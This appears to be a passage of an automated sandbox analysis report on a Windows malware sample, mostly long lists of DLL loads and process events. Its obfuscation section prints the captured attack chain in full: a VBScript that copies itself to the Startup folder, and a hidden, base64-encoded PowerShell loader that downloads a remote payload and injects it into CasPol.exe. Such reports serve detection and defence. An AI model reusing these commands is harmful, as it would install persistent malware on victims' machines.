                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000009.00000002.1704495175.000001691101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1736234279.000001697BE10000.00000004.08000000.00040000.00000000.sdmp

                Data Obfuscation

                barindex
                VBScript performs obfuscated calls to suspicious functions
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IHost.FullName();IWshShell3.CurrentDirectory();IHost.ScriptName();IWshShell3.SpecialFolders("Startup");IFileSystem3.FileExists("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs");IFileSystem3.CopyFile("C:\Windows\system32\wm.vbs", "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs");IWshShell3.Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IWshShell3.Run("powershell -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJys", "0", "false")
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                Obfuscated command line found
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"Jump to behavior
                Suspicious powershell command line found
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF886C44FF3 push eax; retf 5_2_00007FF886C44FE9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF886C402FD push ds; iretd 5_2_00007FF886C403E2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF886C40CD3 push ds; iretd 5_2_00007FF886C40CDA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887A24223 push cs; ret 9_2_00007FF887A24282
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
